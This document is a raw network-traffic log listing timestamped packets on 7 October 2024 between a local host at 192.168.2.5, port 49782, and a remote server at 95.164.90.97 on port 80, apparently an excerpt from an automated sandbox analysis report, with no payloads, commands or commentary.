Oct 7, 2024 03:15:37.459120989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459135056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459153891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459175110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459188938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459208965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459222078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459239960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459254980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459275961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459285021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459310055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459317923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459336996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459352970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459371090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459405899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459408998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459449053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459462881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.459484100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.459537983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480441093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480492115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480529070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480564117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480598927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480614901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480633020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480669022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480703115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480737925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480771065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480788946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480788946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480788946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480788946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480806112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480844975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480860949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480860949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480860949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480880022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480895996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480916023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.480930090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.480974913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.525816917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.525855064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.525911093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.525929928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.525944948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.525995970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.525998116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526017904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526048899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526061058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526082993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526107073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526115894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526149035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526149035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526168108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526182890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526210070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526217937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526232958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526251078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526282072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526284933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526308060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526316881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526338100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526350021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.526375055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.526411057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.545747995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545835018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545851946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.545871019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545906067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545919895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.545939922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545974016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.545979977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546011925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546019077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546044111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546065092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546509027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546565056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546580076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546612024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546617985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546653986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546708107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546714067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546767950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546770096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546802044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546833992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546835899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546864986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546869040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546897888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546904087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546921968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546931028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546946049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546962976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.546977997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.546996117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547009945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547044992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547051907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547086000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547101021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547136068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547136068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547197104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547207117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547255039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547255993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547308922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547313929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547341108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547358990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547374964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547401905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547426939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547429085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547462940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547494888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547525883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547533035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547560930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547564030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547593117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547600031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547625065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547625065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547642946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547657967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547691107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547720909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547723055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547743082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547756910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.547785044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.547815084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548146009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548173904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548234940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548237085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548270941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548285961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548300028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548321009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548333883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548347950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548376083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548387051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548408031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548420906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548444033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548455954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548495054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548608065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548641920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548671961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548672915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548696041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548724890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548727036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548777103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548827887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548834085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548863888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548892021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548897982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548924923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548943043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.548943996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548978090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.548991919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549005985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549026012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549050093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549056053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549088955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549120903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549134970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549158096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549169064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549195051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549194098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549216986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549242020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549259901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549312115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549319983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549345970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549375057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549395084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549398899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549433947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549465895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549484968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549485922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549520016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549544096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549552917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549568892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549586058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549603939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549614906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549642086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549658060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549668074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549721003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549746037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549767017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549768925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549803019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549818993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549834967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549849987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549868107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549881935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549900055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549916029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549932957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549946070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549964905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.549985886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.549998045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550029993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550046921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550065041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550086975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550096035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550124884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550128937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550146103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550163031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550180912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550196886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550213099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550225973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550254107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550259113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550291061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550306082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550326109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550338030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550367117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550412893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550447941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.550493956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.550517082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571021080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571074963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571098089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571125984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571130991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571178913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571180105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571230888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571239948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571264029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571281910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571297884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571316004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571330070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571346998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571362019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571377993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571408033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571418047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571450949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571482897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571502924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571517944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571549892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571549892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571584940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.571589947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571614027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.571636915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623182058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623234987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623269081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623337030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623370886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623404026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623404026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623404026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623420954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623442888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623455048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623486042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623488903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623507023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623522997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623555899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623567104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623589039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623591900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623614073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623621941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623641014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623653889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623687029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.623704910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.623752117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.636702061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636817932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636848927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636861086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.636861086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.636882067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636914968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636928082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.636949062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.636981010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637018919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637018919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637039900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637077093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637612104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637646914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637702942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637706041 CEST	80	49782	95.164.90.97	192.168.2.5
